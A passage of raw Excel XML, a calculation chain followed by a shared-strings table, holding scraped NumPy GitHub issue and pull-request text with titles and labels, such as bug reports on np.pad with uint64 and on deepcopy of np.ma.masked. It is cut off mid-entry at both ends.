  <c r="H1219" i="1"/>
  <c r="H1220" i="1"/>
  <c r="H1221" i="1"/>
  <c r="H1222" i="1"/>
  <c r="H1223" i="1"/>
  <c r="H1224" i="1"/>
  <c r="H1225" i="1"/>
  <c r="H1226" i="1"/>
  <c r="H1227" i="1"/>
  <c r="H1228" i="1"/>
  <c r="H1229" i="1"/>
  <c r="H1231" i="1"/>
  <c r="H1232" i="1"/>
  <c r="H1233" i="1"/>
  <c r="H1234" i="1"/>
  <c r="H1235" i="1"/>
  <c r="H1236" i="1"/>
  <c r="H1237" i="1"/>
  <c r="H1238" i="1"/>
  <c r="H1239" i="1"/>
  <c r="H1240" i="1"/>
  <c r="H1241" i="1"/>
  <c r="H1243" i="1"/>
  <c r="H1244" i="1"/>
  <c r="H1245" i="1"/>
  <c r="H1246" i="1"/>
  <c r="H1247" i="1"/>
  <c r="H1248" i="1"/>
  <c r="H1249" i="1"/>
  <c r="H1250" i="1"/>
  <c r="H1251" i="1"/>
  <c r="H1252" i="1"/>
  <c r="H1255" i="1"/>
  <c r="H1256" i="1"/>
  <c r="H1257" i="1"/>
  <c r="H1266" i="1"/>
  <c r="H1258" i="1"/>
  <c r="H1259" i="1"/>
  <c r="H1260" i="1"/>
  <c r="H1261" i="1"/>
  <c r="H1262" i="1"/>
  <c r="H1263" i="1"/>
  <c r="H1264" i="1"/>
  <c r="H1265"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2" i="1"/>
  <c r="H1321" i="1"/>
  <c r="H1337" i="1"/>
  <c r="H1323" i="1"/>
  <c r="H1334" i="1"/>
  <c r="H1324" i="1"/>
  <c r="H1325" i="1"/>
  <c r="H1326" i="1"/>
  <c r="H1327" i="1"/>
  <c r="H1328" i="1"/>
  <c r="H1329" i="1"/>
  <c r="H1330" i="1"/>
  <c r="H1331" i="1"/>
  <c r="H1332" i="1"/>
  <c r="H1333" i="1"/>
  <c r="H1335" i="1"/>
  <c r="H1336"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80" i="1"/>
  <c r="H1376" i="1"/>
  <c r="H1377" i="1"/>
  <c r="H1378" i="1"/>
  <c r="H1379"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50" i="1"/>
  <c r="H1449" i="1"/>
  <c r="H1452" i="1"/>
  <c r="H1451" i="1"/>
  <c r="H1465" i="1"/>
  <c r="H1453" i="1"/>
  <c r="H1454" i="1"/>
  <c r="H1455" i="1"/>
  <c r="H1456" i="1"/>
  <c r="H1457" i="1"/>
  <c r="H1458" i="1"/>
  <c r="H1459" i="1"/>
  <c r="H1460" i="1"/>
  <c r="H1461" i="1"/>
  <c r="H1462" i="1"/>
  <c r="H1463" i="1"/>
  <c r="H1464" i="1"/>
  <c r="H1466" i="1"/>
  <c r="H1467" i="1"/>
  <c r="H1468" i="1"/>
  <c r="H1469" i="1"/>
  <c r="H1470" i="1"/>
  <c r="H1471" i="1"/>
  <c r="H1472" i="1"/>
  <c r="H1473" i="1"/>
  <c r="H1474" i="1"/>
  <c r="H1475" i="1"/>
  <c r="H1476" i="1"/>
  <c r="H1477" i="1"/>
  <c r="H1478" i="1"/>
  <c r="H1479" i="1"/>
  <c r="H1480" i="1"/>
  <c r="H1481" i="1"/>
  <c r="H1482" i="1"/>
  <c r="H1483" i="1"/>
  <c r="H1485" i="1"/>
  <c r="H1490" i="1"/>
  <c r="H1484" i="1"/>
  <c r="H1486" i="1"/>
  <c r="H1487" i="1"/>
  <c r="H1488" i="1"/>
  <c r="H1489" i="1"/>
  <c r="H1491" i="1"/>
  <c r="H1492" i="1"/>
  <c r="H1493" i="1"/>
  <c r="H1494" i="1"/>
  <c r="H1495" i="1"/>
  <c r="H1496" i="1"/>
  <c r="H1497" i="1"/>
  <c r="H1501" i="1"/>
  <c r="H1498" i="1"/>
  <c r="H1499" i="1"/>
  <c r="H1500" i="1"/>
  <c r="H1502" i="1"/>
  <c r="H1503" i="1"/>
  <c r="H1504" i="1"/>
  <c r="H1505" i="1"/>
  <c r="H1506" i="1"/>
  <c r="H1507" i="1"/>
  <c r="H1508" i="1"/>
  <c r="H1509" i="1"/>
  <c r="H1510" i="1"/>
  <c r="H1511" i="1"/>
  <c r="H1512" i="1"/>
  <c r="H1513" i="1"/>
  <c r="H1514" i="1"/>
  <c r="H1515" i="1"/>
  <c r="H1516" i="1"/>
  <c r="H1517" i="1"/>
  <c r="H1518" i="1"/>
  <c r="H1519" i="1"/>
  <c r="H1520" i="1"/>
  <c r="H1521" i="1"/>
  <c r="H1524" i="1"/>
  <c r="H1522" i="1"/>
  <c r="H1523" i="1"/>
  <c r="H1525" i="1"/>
  <c r="H1526" i="1"/>
  <c r="H1527" i="1"/>
  <c r="H1529" i="1"/>
  <c r="H1528"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23" i="1"/>
  <c r="H1612" i="1"/>
  <c r="H1613" i="1"/>
  <c r="H1614" i="1"/>
  <c r="H1615" i="1"/>
  <c r="H1616" i="1"/>
  <c r="H1631" i="1"/>
  <c r="H1642" i="1"/>
  <c r="H1653" i="1"/>
  <c r="H1646" i="1"/>
  <c r="H1703" i="1"/>
  <c r="H1617" i="1"/>
  <c r="H1666" i="1"/>
  <c r="H1618" i="1"/>
  <c r="H1619" i="1"/>
  <c r="H1620" i="1"/>
  <c r="H1621" i="1"/>
  <c r="H1622" i="1"/>
  <c r="H1624" i="1"/>
  <c r="H1625" i="1"/>
  <c r="H1626" i="1"/>
  <c r="H1627" i="1"/>
  <c r="H1628" i="1"/>
  <c r="H1629" i="1"/>
  <c r="H1630" i="1"/>
  <c r="H1632" i="1"/>
  <c r="H1633" i="1"/>
  <c r="H1634" i="1"/>
  <c r="H1635" i="1"/>
  <c r="H1636" i="1"/>
  <c r="H1637" i="1"/>
  <c r="H1638" i="1"/>
  <c r="H1639" i="1"/>
  <c r="H1640" i="1"/>
  <c r="H1641" i="1"/>
  <c r="H1643" i="1"/>
  <c r="H1644" i="1"/>
  <c r="H1645" i="1"/>
  <c r="H1647" i="1"/>
  <c r="H1648" i="1"/>
  <c r="H1649" i="1"/>
  <c r="H1650" i="1"/>
  <c r="H1651" i="1"/>
  <c r="H1652" i="1"/>
  <c r="H1654" i="1"/>
  <c r="H1655" i="1"/>
  <c r="H1656" i="1"/>
  <c r="H1657" i="1"/>
  <c r="H1658" i="1"/>
  <c r="H1659" i="1"/>
  <c r="H1660" i="1"/>
  <c r="H1661" i="1"/>
  <c r="H1662" i="1"/>
  <c r="H1663" i="1"/>
  <c r="H1664" i="1"/>
  <c r="H1665" i="1"/>
  <c r="H1667" i="1"/>
  <c r="H1668" i="1"/>
  <c r="H1669" i="1"/>
  <c r="H1670" i="1"/>
  <c r="H1671" i="1"/>
  <c r="H1672" i="1"/>
  <c r="H1673" i="1"/>
  <c r="H1674" i="1"/>
  <c r="H1675" i="1"/>
  <c r="H1682" i="1"/>
  <c r="H1676" i="1"/>
  <c r="H1677" i="1"/>
  <c r="H1678" i="1"/>
  <c r="H1679" i="1"/>
  <c r="H1680" i="1"/>
  <c r="H1681" i="1"/>
  <c r="H1683" i="1"/>
  <c r="H1684" i="1"/>
  <c r="H1685" i="1"/>
  <c r="H1686" i="1"/>
  <c r="H1687" i="1"/>
  <c r="H1688" i="1"/>
  <c r="H1689" i="1"/>
  <c r="H1690" i="1"/>
  <c r="H1691" i="1"/>
  <c r="H1692" i="1"/>
  <c r="H1700" i="1"/>
  <c r="H1693" i="1"/>
  <c r="H1694" i="1"/>
  <c r="H1695" i="1"/>
  <c r="H1696" i="1"/>
  <c r="H1697" i="1"/>
  <c r="H1718" i="1"/>
  <c r="H1698" i="1"/>
  <c r="H1699" i="1"/>
  <c r="H1701" i="1"/>
  <c r="H1702" i="1"/>
  <c r="H1704" i="1"/>
  <c r="H1705" i="1"/>
  <c r="H1706" i="1"/>
  <c r="H1707" i="1"/>
  <c r="H1708" i="1"/>
  <c r="H1709" i="1"/>
  <c r="H1710" i="1"/>
  <c r="H1711" i="1"/>
  <c r="H1712" i="1"/>
  <c r="H1713" i="1"/>
  <c r="H1714" i="1"/>
  <c r="H1715" i="1"/>
  <c r="H1716" i="1"/>
  <c r="H1717" i="1"/>
  <c r="H1719" i="1"/>
  <c r="H1720" i="1"/>
  <c r="H1721" i="1"/>
  <c r="H1722" i="1"/>
  <c r="H1723" i="1"/>
  <c r="H1724" i="1"/>
  <c r="H1725" i="1"/>
  <c r="H1726" i="1"/>
  <c r="H1727" i="1"/>
  <c r="H1728" i="1"/>
  <c r="H1729" i="1"/>
  <c r="H1730" i="1"/>
  <c r="H1731" i="1"/>
  <c r="H1732" i="1"/>
  <c r="H1733" i="1"/>
  <c r="H1734" i="1"/>
  <c r="H1735" i="1"/>
  <c r="H1736" i="1"/>
  <c r="H1738" i="1"/>
  <c r="H1737" i="1"/>
  <c r="H1739" i="1"/>
  <c r="H1740" i="1"/>
  <c r="H1741" i="1"/>
  <c r="H1742" i="1"/>
  <c r="H1743" i="1"/>
  <c r="H1744" i="1"/>
  <c r="H1745" i="1"/>
  <c r="H1746" i="1"/>
  <c r="H1749" i="1"/>
  <c r="H1747" i="1"/>
  <c r="H1748" i="1"/>
  <c r="H1750" i="1"/>
  <c r="H1751" i="1"/>
  <c r="H1752" i="1"/>
  <c r="H1753" i="1"/>
  <c r="H1754" i="1"/>
  <c r="H1755" i="1"/>
  <c r="H1756" i="1"/>
  <c r="H1757" i="1"/>
  <c r="H1758" i="1"/>
  <c r="H1759" i="1"/>
  <c r="H1766" i="1"/>
  <c r="H1760" i="1"/>
  <c r="H1761" i="1"/>
  <c r="H1762" i="1"/>
  <c r="H1763" i="1"/>
  <c r="H1764" i="1"/>
  <c r="H1765" i="1"/>
  <c r="H1767" i="1"/>
  <c r="H1768" i="1"/>
  <c r="H1769" i="1"/>
  <c r="H1770" i="1"/>
  <c r="H1771" i="1"/>
  <c r="H1772" i="1"/>
  <c r="H1773" i="1"/>
  <c r="H1774" i="1"/>
  <c r="H1775" i="1"/>
  <c r="H1776" i="1"/>
  <c r="H1777" i="1"/>
  <c r="H1778" i="1"/>
  <c r="H1779" i="1"/>
  <c r="H1788" i="1"/>
  <c r="H1780" i="1"/>
  <c r="H1781" i="1"/>
  <c r="H1782" i="1"/>
  <c r="H1783" i="1"/>
  <c r="H1883" i="1"/>
  <c r="H1784" i="1"/>
  <c r="H1785" i="1"/>
  <c r="H1786" i="1"/>
  <c r="H1787" i="1"/>
  <c r="H1789" i="1"/>
  <c r="H1790" i="1"/>
  <c r="H1791" i="1"/>
  <c r="H1792" i="1"/>
  <c r="H1793" i="1"/>
  <c r="H1794" i="1"/>
  <c r="H1795" i="1"/>
  <c r="H1796" i="1"/>
  <c r="H1797" i="1"/>
  <c r="H1798" i="1"/>
  <c r="H1799" i="1"/>
  <c r="H1800" i="1"/>
  <c r="H1801" i="1"/>
  <c r="H1802" i="1"/>
  <c r="H1805" i="1"/>
  <c r="H1803" i="1"/>
  <c r="H1804"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alcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8761" uniqueCount="4826">
  <si>
    <t>issue_body</t>
  </si>
  <si>
    <t>issue_number</t>
  </si>
  <si>
    <t>issues_title</t>
  </si>
  <si>
    <t>issues_status</t>
  </si>
  <si>
    <t>create_time</t>
  </si>
  <si>
    <t>closed_time</t>
  </si>
  <si>
    <t>label_name_list</t>
  </si>
  <si>
    <t>closed</t>
  </si>
  <si>
    <t xml:space="preserve">Implemented deepcopy on MaskedConstant returning just self_x000D_
_x000D_
Fixes #11021 </t>
  </si>
  <si>
    <t>ENH: Add `__deepcopy__` to MaskedConstant</t>
  </si>
  <si>
    <t>['00 - Bug', '01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>compiling with clang, I discovered an uninitialized variable and many unused function warnings. This PR fixes the uninitialized value and splits generation of `byte_long`, `byte_float` and friends since the `*_long` variants are not used on python3_x000D_
_x000D_
There are still unused functions in `umath_linalg.c.src`, TBD in another pull request since some of the unused functions seem to have value for debugging (`dump_*`)</t>
  </si>
  <si>
    <t>BUG: initialize value before use</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Fixes #10370. We should find a more generic and explicit way to prevent optimizing compilers from reordering the call to `npy_get_floatstatus`._x000D_
_x000D_
To reproduce the problem, clang or gcc-8.1 are required. Confirmed that this fixes the problem using clang-6.0</t>
  </si>
  <si>
    <t>BUG: optimizing compilers can reorder call to npy_get_floatstatus</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.core']</t>
  </si>
  <si>
    <t>The numpy version is 1.14.3.  The correct results (displayed as number) occur with Python 3.6.5._x000D_
_x000D_
```_x000D_
C:\MISC&gt;ver_x000D_
_x000D_
Microsoft Windows [Version 6.1.7601]_x000D_
_x000D_
C:\MISC&gt;python_x000D_
Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] on win32_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.sqrt(2)_x000D_
'1.4142135623730951'_x000D_
&gt;&gt;&gt;_x000D_
````</t>
  </si>
  <si>
    <t>In Python 2.7.15, certain scalars are printed as strings</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">I had existing code that uses BytesIO and a byte delimiter. It worked in &lt;=1.13 and breaks after.  The code works if the delimiter is switched to a string. All tests were performed with Python 3.6.5 from Anaconda. The failure can be reproduced using the excerpt below._x000D_
_x000D_
Fails using 1.14.0, 1.14.1, and 1.14.2_x000D_
```_x000D_
python -c "import numpy as np; import io; print(np.version.version); data = np.recfromtxt(io.BytesIO(b'SPC:MW\nNO:30\nNO2:36'), delimiter=b':', dtype = ['S3', 'f4']); print(data)"_x000D_
1.14.2_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;string&gt;", line 1, in &lt;module&gt;_x000D_
  File "/work/ROMO/anaconda3/envs/testnp113/lib/python3.6/site-packages/numpy/lib/npyio.py", line 2230, in recfromtxt_x000D_
    output = genfromtxt(fname, **kwargs)_x000D_
  File "/work/ROMO/anaconda3/envs/testnp113/lib/python3.6/site-packages/numpy/lib/npyio.py", line 2116, in genfromtxt_x000D_
    rows = np.array(data, dtype=[('', _) for _ in dtype_flat])_x000D_
ValueError: could not assign tuple of length 1 to structure with 2 fields._x000D_
```_x000D_
_x000D_
Passes with 1.13.3_x000D_
```_x000D_
python -c "import numpy as np; import io; print(np.version.version); data = np.recfromtxt(io.BytesIO(b'SPC:MW\nNO:30\nNO2:36'), delimiter=b':', dtype = ['S3', 'f4']); print(data)"_x000D_
1.13.3_x000D_
[(b'SPC',  nan) (b'NO',  30.) (b'NO2',  36.)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>recfromtext bytes delimiter</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>This seems to be an edge case, nevertheless I wanted to report this behavior. Especially because I find it kind of interesting._x000D_
_x000D_
### Description_x000D_
_x000D_
When padding an array of dtype uint64 there are some cases when mode "constant" doesn't append with the correct value but instead pads with 0._x000D_
_x000D_
**Code to reproduce**_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; offset = 1024_x000D_
&gt;&gt;&gt; pad_value = np.uint64(-1024)_x000D_
&gt;&gt;&gt; x = np.zeros(5, dtype=np.uint64) - offset_x000D_
&gt;&gt;&gt; np.pad(x, 1, mode="constant", constant_values=pad_value)_x000D_
array([                   0, 18446744073709551615, 18446744073709551615,_x000D_
       18446744073709551615, 18446744073709551615, 18446744073709551615,_x000D_
                          0], dtype=uint64)_x000D_
```_x000D_
_x000D_
**Expected Result**_x000D_
_x000D_
```python_x000D_
array([18446744073709551615, 18446744073709551615, 18446744073709551615,_x000D_
       18446744073709551615, 18446744073709551615, 18446744073709551615,_x000D_
       18446744073709551615], dtype=uint64)_x000D_
```_x000D_
_x000D_
There are some interesting observations to be made:_x000D_
_x000D_
- This only happens for uint64 (uint32, uint16 and below are fine)._x000D_
- This behavior is only visible if `offset` is in [1, 1024] and the argument of `np.uint64` in `pad_value` is in [-1, -1024]._x000D_
- `np.pad(x, 1, mode="minimum")` (or `maximum`) works fine,  regardless of `offset`._x000D_
_x000D_
### Platform, versions, etc._x000D_
_x000D_
NumPy: 1.14.2_x000D_
Operating system: Manjaro 17.1.7, x86_64 Linux 4.14.36-1-MANJARO_x000D_
Python version: 3.6.5 (Anaconda, [GCC 7.2.0] on linux)_x000D_
_x000D_
_x000D_
I hope this is reproduce-able and not a weird quirk of my setup. Feel free to ask for further diagnostics if you can think of any.</t>
  </si>
  <si>
    <t>BUG: Unexpected pad value when padding an uint64 array</t>
  </si>
  <si>
    <t>['00 - Bug']</t>
  </si>
  <si>
    <t>prefer using `PyUFunc_FromFuncAndData` even though some of the fields are reset later in `ufunc_frompyfunc` to ensure all initialization is completed.</t>
  </si>
  <si>
    <t>MAINT: reduce code duplication in ufunc_frompyfunc</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Previously:_x000D_
_x000D_
* The last bin edge was treated as "fuzzy", extending 1e-6 times the smallest bin width beyond the end of the array (gh-10864)_x000D_
* Integer bin edges were cast to float, which for large integers would cause non-equal edges to become equal_x000D_
_x000D_
Note that this is different to gh-7845, which is about precision on the _outputs_.</t>
  </si>
  <si>
    <t>BUG: np.histogramdd loses precision on its inputs, leading to incorrect results</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>I would expect that copy or deepcopy of `np.ma.masked` would give me the same object, but this doesn't appear to be the case:_x000D_
```_x000D_
In [9]: copy.deepcopy(np.ma.masked)_x000D_
Out[9]: _x000D_
masked_array(data=--,_x000D_
             mask=True,_x000D_
       fill_value=1e+20,_x000D_
            dtype=float64)_x000D_
_x000D_
In [10]: copy.copy(np.ma.masked)_x000D_
Out[10]: _x000D_
masked_array(data=--,_x000D_
             mask=True,_x000D_
       fill_value=1e+20,_x000D_
            dtype=float64)_x000D_
_x000D_
In [11]: type(copy.deepcopy(np.ma.masked))_x000D_
Out[11]: numpy.ma.core.MaskedArray_x000D_
_x000D_
In [12]: type(np.ma.masked)_x000D_
Out[12]: numpy.ma.core.MaskedConstant_x000D_
_x000D_
In [13]: np.__version___x000D_
Out[13]: '1.14.2'_x000D_
```</t>
  </si>
  <si>
    <t>Copy and deepcopy of np.ma.masked returns np.ma.array()</t>
  </si>
  <si>
    <t>['component: numpy.ma', 'good first issue']</t>
  </si>
  <si>
    <t>EDIT: this is now for `axis` only - keepdims has been added._x000D_
_x000D_
Follow-up on #8819, specifically for generalized ufuncs that are like reductions on a single axis._x000D_
_x000D_
EDIT: most of the below has become irrelevant._x000D_
_x000D_
~As is, the implementation is not super-elegant:~ EDIT: now quite elegant._x000D_
- For ``keepdims``, ~checks are added every time the output core dimensions are accessed; it might make more sense to adjust just once.~ EDIT: this is now solved._x000D_
- For ``axis``, ~a full ``axes`` list is constructed rather than directly use the value (an advantage, though, is that an extension to passing in a tuple or `None` for ``axis`` would be that much easier).~ (EDIT) currently a separate routine is used from that for ``axes``, which means that any reinterpretation of what values it can have (currently, only int) would have to be done in two places. This would involve only a trivial refactor, though._x000D_
_x000D_
But I think this is worth having a careful look. It would be nice to have this in 1.15, together with the ``axes`` argument._x000D_
_x000D_
p.s. I tried to keep the commits adding ``keepdims`` and ``axis`` separate, as they are somewhat separate enhancements (and it might help review)._x000D_
_x000D_
EDIT: they certainly helped to find an annoying reference counting bug. All seems OK now.</t>
  </si>
  <si>
    <t>ENH: Implement axis for generalized ufuncs.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.core']</t>
  </si>
  <si>
    <t>This adds support for identifying AARCH32 and AARCH64 at compile_x000D_
time such that alignment etc is correctly determined.</t>
  </si>
  <si>
    <t>ENH: Add AARCH32 support.</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: build', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Follows on from #11011</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: np.pad: Add helper functions for producing slices along axes</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>This file is pretty repetitive - this picks off some of the low-hanging fruit.</t>
  </si>
  <si>
    <t>MAINT: Simplify dimension-juggling in np.pad</t>
  </si>
  <si>
    <t>Continuing #10975 and #10986, this moves all remaining tests that involve `np.matrix` to `matrixlib` itself. The only dependencies left are in explicit checks in the code.</t>
  </si>
  <si>
    <t>Move remaining Matrix tests to matrixlib</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.matrixlib']</t>
  </si>
  <si>
    <t xml:space="preserve">Here are some of my notes after the 1.14.3 release. _x000D_
_x000D_
I updated the procedure to use the "scipy" tagging strategy, which seems safer because it gives us a chance to check all the wheels are OK before pushing the tag._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>DOC: release walkthrough updates from 1.14.3</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation']</t>
  </si>
  <si>
    <t>REL: Fwd port 1.14.3 changelog</t>
  </si>
  <si>
    <t>Get latex in order to render properly (copy package installation from scipy's circle CI setup)_x000D_
_x000D_
Edit - ready to merge, checking CircleCI full output, we no longer have a "WARNING: LaTeX command 'latex' cannot be run" as was previous.</t>
  </si>
  <si>
    <t>TST, BUILD: add latex to circleci doc build</t>
  </si>
  <si>
    <t>['05 - Testing']</t>
  </si>
  <si>
    <t>There is an issue with the way github renders SVG images in README files, isaacs/github#316_x000D_
_x000D_
Fixes #11000</t>
  </si>
  <si>
    <t>DOC: work around GH isaacs/github#316 to show SVG image</t>
  </si>
  <si>
    <t>This very generic error message results in a lot of confusion, so add clear instructions on how to proceed.</t>
  </si>
  <si>
    <t>MAINT: add clearer message to assist users with failed builds.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: build']</t>
  </si>
  <si>
    <t>* a C preprocessor macro in `number.c` contained_x000D_
a `goto` statement that was not necessary; this_x000D_
has been replaced with a C function with_x000D_
equivalent functionality</t>
  </si>
  <si>
    <t>DOC: removed spurious FIXME comment in number.c</t>
  </si>
  <si>
    <t>['03 - Maintenance', '51 - In progress']</t>
  </si>
  <si>
    <t>I seem to have forgotten to `git add` the 1.14.3 changelog in #10957._x000D_
_x000D_
Adding it now.</t>
  </si>
  <si>
    <t>REL: add 1.14.3 changelog</t>
  </si>
  <si>
    <t>['04 - Documentation']</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I've noticed that numpy's testsuite hangs when numpy is built against MKL 2018.2 - but runs to completion when built against MKL 2017.1._x000D_
_x000D_
This is the case for numpy v1.14.2, 1.14.x HEAD and master branches._x000D_
_x000D_
I'm on CentOS 7.4 x86_64 on a Broadwell processor, python 2.7.5 (but also affects other pythons), Cython 0.28.2, nose 1.3.7._x000D_
_x000D_
By executing this: python -c "import numpy; numpy.test(verbose=2)"_x000D_
_x000D_
I can see that the hang occurs while running this test: numpy.distutils.tests.test_exec_command.TestExecCommand.test_basic_x000D_
_x000D_
At this point, the python interpreter is consuming an entire CPU core and, if I strace it, I see a stream of identical lines, all showing:_x000D_
_x000D_
sched_yield()                           = 0_x000D_
_x000D_
Any ideas, please?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Testsuite hangs when built with MKL 2018.2 (but not 2017.1)</t>
  </si>
  <si>
    <t>['00 - Bug', '29 - Intel/Anaconda']</t>
  </si>
  <si>
    <t>Fixes the edge cases for the calculation of an empty `np.linalg.norm`, for `ord=np.inf` (returns `0.0`) and `ord=-np.inf` (returns `np.inf`).
Fixes #3763</t>
  </si>
  <si>
    <t>BUG: Fix empty linalg.norm for ord=inf and ord=-inf.</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>We could also instead use b-strings everywhere, but encouraging unicode seems like the right thing to do._x000D_
_x000D_
Fixes #8498</t>
  </si>
  <si>
    <t>DOC: Update genfromtxt docs to use StringIO and u-strings</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Extracted from #9022_x000D_
_x000D_
No behavior changes, but makes the `__array_wrap__` logic a little clearer.</t>
  </si>
  <si>
    <t>MAINT: Small tidy-ups to ufunc_object.c</t>
  </si>
  <si>
    <t>DOC: Correction to docstring example (result was correct)</t>
  </si>
  <si>
    <t>Further progress in isolating matrix in preparation of its deprecation.  There is one place left with an explicit reference to matrix (in `MaskedArray.count`), which is to be solved later.</t>
  </si>
  <si>
    <t>MAINT: move all masked array matrix tests to matrixlib.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.ma', 'component: numpy.matrixlib']</t>
  </si>
  <si>
    <t xml:space="preserve">The docstring already assumed this was the case, and this ensures linalg becomes completely independent of matrixlib (together with #10975, which moves the tests). Furthermore, since linalg allows stacks of matrices generally, there is no reason not to allow it for matrix_power, so that is made possible.           </t>
  </si>
  <si>
    <t>MAINT, ENH: Move matrix_power to linalg and allow higher dimensions.</t>
  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', 'component: numpy.linalg', 'component: numpy.matrixlib']</t>
  </si>
  <si>
    <t xml:space="preserve">Hello , please i run this code : _x000D_
_x000D_
# print the summary of the architecture_x000D_
model.summary()_x000D_
# load the loss summary (training and validation losses)_x000D_
import pickle_x000D_
losses = pickle.load( open('./tmpdata/history_exp' + str(exp_number) + '.pickle'   , 'rb'))_x000D_
# load the test set_x000D_
test_set = pickle.load( open('./tmpdata/TestSet.pickle', 'rb'))_x000D_
X_test = test_set['X_test']_x000D_
Y_test = test_set["Y_test"] _x000D_
_x000D_
and i get this issue : _x000D_
_x000D_
ImportError                               Traceback (most recent call last)_x000D_
&lt;ipython-input-15-12ed6851ec03&gt; in &lt;module&gt;()_x000D_
      5 exp_number = 15_x000D_
      6 with open('/home/ubuntu/nilmtk/nilmtk/neuralnilm/tmpdata/history_exp' + str(exp_number) + '.pickle'   , 'rb') as f:_x000D_
----&gt; 7     losses = pickle.load(f)_x000D_
      8 # load the test set_x000D_
      9 with open('/home/ubuntu/nilmtk/nilmtk/neuralnilm/tmpdata/TestSet.pickle', 'rb') as v:_x000D_
_x000D_
ImportError: No module named multiarray_x000D_
_x000D_
can someone please help me </t>
  </si>
  <si>
    <t>ImportError: No module named multiarray</t>
  </si>
  <si>
    <t>['15 - Discussion', '53 - Invalid', '57 - Close?']</t>
  </si>
  <si>
    <t>one more doc cleanup pull request. This:_x000D_
- removes a recursive link_x000D_
- adds a link to the governance document from the about page_x000D_
- refactors an external link to an internal one</t>
  </si>
  <si>
    <t>DOC: link to governance, convert external link to internal</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation']</t>
  </si>
  <si>
    <t>```python_x000D_
&gt;&gt;&gt; class Struct(ctypes.Structure):_x000D_
...     fields = [('a', ctypes.c_int16)]_x000D_
_x000D_
&gt;&gt;&gt; arr = (Struct*3)()_x000D_
_x000D_
&gt;&gt;&gt; np.ctypeslib.as_array(arr)_x000D_
AttributeError: 'Struct' object has no attribute '__array_interface__'_x000D_
# hmm_x000D_
_x000D_
&gt;&gt;&gt; pointer = ctypes.pointer(arr[0])_x000D_
&gt;&gt;&gt; np.ctypeslib.as_array(pointer, shape=(3,))_x000D_
array([None, None, None], dtype=object)_x000D_
# wat_x000D_
_x000D_
&gt;&gt;&gt; pointer_all = ctypes.pointer(arr)_x000D_
&gt;&gt;&gt; np.ctypeslib.as_array(pointer_all, shape=())_x000D_
array(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', _x000D_
      dtype='|V24')_x000D_
# wat_x000D_
```</t>
  </si>
  <si>
    <t>np.ctypeslib.as_array(struct_array) gives an unstructured void array</t>
  </si>
  <si>
    <t>This is meant to be the start of consolidating all the tests done on `np.matrix` in `matrixlib`, which, in turn, should make it easier to deprecate and eventually remove of the matrix class.</t>
  </si>
  <si>
    <t>MAINT: move linalg tests using matrix to matrixlib</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing']</t>
  </si>
  <si>
    <t>Backport of #10824</t>
  </si>
  <si>
    <t>(Backport 1.14.3) BUG: test, fix PyArray_DiscardWritebackIfCopy refcount issue and docu…</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t>This is the first commit of #10142, which just adds advice against using `matrix`. I thought it was relatively uncontroversial, and should not cause any test failures, so probably good to treat separately.</t>
  </si>
  <si>
    <t>DOC: advise against use of matrix.</t>
  </si>
  <si>
    <t>#10891</t>
  </si>
  <si>
    <t>MAINT: Remove workaround for gh-10891</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.core']</t>
  </si>
  <si>
    <t>At this point, we can rely on PEP3118 support within ctypes and numpy_x000D_
_x000D_
Fixes gh-10968_x000D_
Fixes gh-2671_x000D_
Closes gh-6214 (commit is cherry-picked, thanks @tynn!)</t>
  </si>
  <si>
    <t>WIP: Remove fragile use of  `__array_interface__` in ctypeslib.as_array</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '05 - Testing']</t>
  </si>
  <si>
    <t>Introduced in #10882.  A bunch of possible fixes exist:_x000D_
_x000D_
* Allow `__array_interface__` to take precedence over the buffer protocol (previously it did, but only if the buffer protocol crashed)_x000D_
* Reimplement `as_array` to convert the ctypes pointer into a ctypes array type first. (#10970)</t>
  </si>
  <si>
